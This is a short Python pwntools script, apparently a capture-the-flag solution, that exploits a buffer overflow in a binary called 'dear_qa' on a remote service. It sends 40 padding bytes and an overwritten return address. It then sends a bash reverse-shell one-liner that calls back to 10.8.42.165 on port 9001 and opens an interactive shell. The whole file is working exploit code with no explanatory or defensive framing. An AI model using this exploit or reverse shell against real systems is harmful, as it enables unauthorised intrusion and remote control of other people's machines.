#!/usr/bin/env python3

from pwn import *

host = "10.10.14.79"
port = 5700

context(terminal = ['tmux', 'new-window']) 
binary = context.binary = ELF("./dear_qa")
context(os = "linux", arch = "amd64")

connect = remote(host,port)
log.info("starting buffer")
connect.recvuntil(b"What's your name: ")
log.info("lets buff")

payload = b'A' * 40
payload += p64(0x00400686)
log.info("sending a's and b's")
connect.sendline(payload)
connect.sendline("bash -c 'bash -i >& /dev/tcp/10.8.42.165/9001 0>&1'")
log.info("you got shell")
connect.interactive()



# https://docs.pwntools.com/en/stable/intro.html